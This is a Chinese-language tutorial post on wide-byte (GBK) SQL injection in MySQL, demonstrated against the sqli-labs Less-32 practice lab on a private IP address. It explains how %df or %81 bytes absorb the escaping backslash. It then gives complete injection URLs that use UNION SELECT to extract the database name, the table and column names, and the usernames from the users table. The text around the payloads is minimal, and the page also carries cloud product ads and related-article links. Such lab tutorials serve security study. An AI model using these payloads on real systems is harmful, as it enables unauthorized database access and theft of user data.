MySQL注入 -- 宽字节注入

本文涉及的产品
RDS DuckDB + QuickBI 企业套餐,8核32GB + QuickBI 专业版
RDS MySQL DuckDB 分析主实例,集群系列 4核8GB
RDS AI 助手,专业版
简介: MySQL注入 -- 宽字节注入

一、宽字节注入介绍

1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入

2、GBK编码表,%DF%5C正好组成( 運),所以会把\"吃掉",0X81-0XFE都可以

0a2653c851af460fa595bd959398a8f1.png

二、实例演示

1、获取数据库名称

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+

0eacb84100b54626af849e6b562bf92a.png

2、获取数据库security的表

http://192.168.139.129/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 --+

2d65d23f6d4748949b924e4057485923.png

3、获取下一个表

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1 --+

2e9b90b2ca334476abebe75bafe6eeaa.png

4、获取表名为users的字段名

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 limit 11,1--+

0a2653c851af460fa595bd959398a8f1.png

5、获取字段内容

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users limit 1,1 --+

0eacb84100b54626af849e6b562bf92a.png

禁止非法,后果自负

相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。   相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情: https://www.aliyun.com/product/rds/mysql 
目录
相关文章
|
9月前
|
关系型数据库 MySQL Java
字节面试: MySQL 百万级 导入发生的 “死锁” 难题如何解决?“2序4拆”,彻底攻克
字节面试: MySQL 百万级 导入发生的 “死锁” 难题如何解决?“2序4拆”,彻底攻克
字节面试: MySQL 百万级 导入发生的 “死锁” 难题如何解决?“2序4拆”,彻底攻克
|
SQL 安全 关系型数据库
mysql注入-字符编码技巧
通过字符编码技巧,攻击者可以在SQL注入中绕过常见的输入验证机制,成功攻击数据库。因此,理解这些技巧及其可能的攻击路径,对防御SQL注入至关重要。开发者应采取多层次的安全措施,确保应用程序在不同字符集和编码环境下都能有效防御注入攻击。通过强制使用统一编码、严格的输入验证、预编译语句以及多层次的编码检查,可以有效地提高系统的安全性,防止SQL注入攻击带来的风险。
446 72
|
SQL 关系型数据库 MySQL
字节面试:MySQL自增ID用完会怎样?
字节面试:MySQL自增ID用完会怎样?
227 0
字节面试:MySQL自增ID用完会怎样?
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
133 1
|
消息中间件 关系型数据库 MySQL
MySQL 到 Kafka 实时数据同步实操分享(1),字节面试官职级
MySQL 到 Kafka 实时数据同步实操分享(1),字节面试官职级
|
安全 关系型数据库 MySQL
Mysql注入 -- 数据库导出及读文件
Mysql注入 -- 数据库导出及读文件
239 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 联合注入
Mysql注入 -- 联合注入
151 0
|
关系型数据库 MySQL 数据库
Mysql注入 -- 布尔注入
Mysql注入 -- 布尔注入
153 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 延时注入
Mysql注入 -- 延时注入
508 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
231 0

推荐镜像

更多